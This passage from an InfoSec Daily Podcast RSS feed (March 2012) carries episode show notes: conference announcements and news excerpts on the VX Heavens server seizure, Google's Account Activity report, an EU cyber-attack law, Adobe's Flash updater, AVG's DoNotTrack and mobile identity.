<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">How you can see, the VX Heavens server is unreachable since 23.03.2012. VX Heavens&rsquo; administration sincerelly apologies for the inconvenience caused to You.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">For many years we were tried hard to establish a reliable work of the site, which supplied you with a professional quality information on systems security and computer virology. We do always believed that a true research in any field (computer virology included) is only possible in the atmosphere of trust, openness and mutual assistance.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unfortunately&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Friday, 23 March, the server has being seized by the police forces due to the criminal investigation (article 361-1 Criminal Code of Ukraine &ndash; the creation of the malicious programs with an intent to sell or spread them) based on someone&rsquo;s tip-off on &ldquo;placement into the free access malicious software designed for the unauthorized breaking into computers, automated systems, computer networks&rdquo;&hellip;.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.yahoo.com/google-launches-account-activity-report-feature-194530879.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.yahoo.com/google-launches-account-activity-report-feature-194530879.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google today launched a new opt-in feature called the </span><a href="https://www.google.com/settings/activity/signup/?hl=en"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Account Activity report</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, which gives Google users the ability to see what they do on the wide variety of Google products. As part of the service, Google will also send out a password-protected report each month that provides &ldquo;insights&rdquo; into what you do while signed into Google.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Account Activity report will include all types of analytic data about your Google products usage. For example, Google says that you&rsquo;ll be able to see how much your email usage fluctuates, who your top contacts are, and other data. Users can also view the locations from which they sign into their account, which browsers they use while signed in, and even which operating systems. Data will be provided for a variety of Google products, including search.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Google, &ldquo;knowing more about your own account activity also can help you take steps to protect your Google Account.&rdquo; If, for instance, you notice that someone in Bulgaria is signing into your Google account, but you&rsquo;ve never been to Bulgaria, then you&rsquo;ll know when something&rsquo;s amiss. You can also sign up for Google&rsquo;s two-step verification, which lends added security to your Google Account.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The release of the Account Activity report feature comes less than a month after the Internet giant released a new, unified privacy policy that covers all its products. Prior to the privacy policy&rsquo;s release, many criticized Google for invading user privacy by sharing the data it collects about its users across all its products. Account Activity seems to be a step in the right direction, transparency-wise. But it still leaves much to be desired. Like, for instance, telling you everything the company knows about you and your Web activity. Because of this, we wonder whether Account Activity has much, if any, real use (other than the slight security boost that we mentioned earlier).</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-632-parliament-fail-adobe-updater-satellite-jamming-vx-heavens-and-account-reporting/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3703/0/infosec-daily-podcast-episode-632.mp3" length="20257941" type="audio/mpeg" />
		<itunes:duration>0:42:09</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 632 for March 29, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1, 2012
	Where: Austin, Texas[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 632 for March 29, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1, 2012
	Where: Austin, Texas
	http://www.Infosecsouthwest.com
&#160;
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
	http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://www.europarl.europa.eu/news/en/pressroom/content/20120326IPR41843/html/Hacking-IT-systems-to-become-a-criminal-offence
&#160;
Cyber attacks on IT systems would become a criminal offence punishable by at least two years in prison throughout the EU under a draft law backed by the Civil Liberties Committee on Tuesday. Possessing or distributing hacking software and tools would also be an offence, and companies would be liable for cyber attacks committed for their benefit.
&#160;
The proposal, which would update existing EU legislation on cyber attacks, was approved with by 50 votes in favour, 1 against and 3 abstentions.
&#160;
&#34;We are dealing here with serious criminal attacks, some of which are even conducted by criminal organisations. The financial damage caused for companies, private users and the public side amounts to several billions each year&#34; said rapporteur Monika Hohlmeier (EPP, DE). &#34;No car manufacturer may send a car without a seatbelt into the streets. And if this happens, the company will be held liable for any damage. These rules must also apply in the virtual world&#34; she added.
&#8230;.
Source: &#160;http://blogs.adobe.com/asset/2012/03/an-update-for-the-flash-player-updater.html
Today&#8217;s release of Flash Player contains a new background updater. This new background updater will allow Windows users to choose an automatic update option for future Flash Player updates.
If you read this September 2011 CSIS report, then you saw that 99.8 percent of malware installs through exploit kits are targeting out-of-date software installations. This point was reiterated recently in volume 11 of the Microsoft Security Intelligent Report. Also, attackers have been taking advantage of users trying to manually search for Flash Player updates by buying ads on search engines pretending to be legitimate Flash[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 631 &#8211; AVG Privacy, CellPhone Data,Please No Auto Complete, LulzSec, and Phone Cracking</title>
		<link>http://www.isdpodcast.com/episode-631-avg-privacy-cellphone-dataplease-no-auto-complete-lulzsec-and-phone-cracking</link>
		<comments>http://www.isdpodcast.com/episode-631-avg-privacy-cellphone-dataplease-no-auto-complete-lulzsec-and-phone-cracking#comments</comments>
		<pubDate>Thu, 29 Mar 2012 00:48:44 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3698</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 631 for March 28, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160; Announcements: InfoSec Southwest When: March 30-April 1, 2012 Where: Austin, Texas http://www.Infosecsouthwest.com &#160; Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 631 for March 28, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1, 2012<br class="kix-line-break" /><br />
	Where: Austin, Texas<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
	</span><a href="http://www.outerz0ne.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.techworld.com/security/3347019/avg-adds-do-not-track-technology-antivirus/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.techworld.com/security/3347019/avg-adds-do-not-track-technology-antivirus/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AVG has become the first antivirus vendor to offer a privacy filter to monitor and block websites and ad networks that silently collect Internet usage data from consumers, the company has announced.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Available from today in a service pack for all paid and free AVG antivirus users, DoNotTrack is a plug-in for Internet Explorer, Mozilla and Chrome that keeps tabs on which sites are collecting data as users browse the web.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some of this will be fairly innocent web analytics of the sort gathered by every site to monitor how visitors interact with sites, but AVG said users should also be more aware of social media applications that collected extensive data usage information and ad networks. Both of these could be intrusive in search of the information necessary to serve context-aware advertising, AVG said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AVG users will be able to block or allow these on a case-by-case basis, controlling what data is tracked depending on their assessment of a particular site.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;When you visit a site a lot of data is being collected about you,&rdquo; said AVG CTO, al Ben-Itzhak. &ldquo;Our goal is to make you aware of what is being collected.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The company had designed DoNotTrack as an &lsquo;active&rsquo; tracking system after noticing that the passive voluntary approach pioneered by World Wide Web Consortium (W3C) was often being ignored by providers, he said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A good example of this is Mozilla&#39;s Boot to Gecko operating system for smartphones, which will include support for this approach. Longer run, Ben-Itzhak thought standardised efforts were the best approach to the privacy issue but would take time to mature.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.timescolonist.com/business/Cellphones+quickly+becoming+repository+owner+entire+identity+experts/6350403/story.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.timescolonist.com/business/Cellphones+quickly+becoming+repository+owner+entire+identity+experts/6350403/story.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Would you sooner hand over the key to your house or the password to your cellphone? Your answer now may not be the same in just five years. &nbsp;A report on the future of mobile suggests people&#39;s identities are becoming so tied to their phones that surrendering them soon will be akin to ceding financial, personal and professional control. And when you think about how much of your world is already on your cell, that prediction &mdash; based on data from top communications executives &mdash; seems altogether plausible.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;For the first time, all your identity is going to be in one item. That&#39;s an extremely powerful notion,&quot; says Alex Pallete, planning director for international business development at the International marketing communications firm JWT.</span></p>
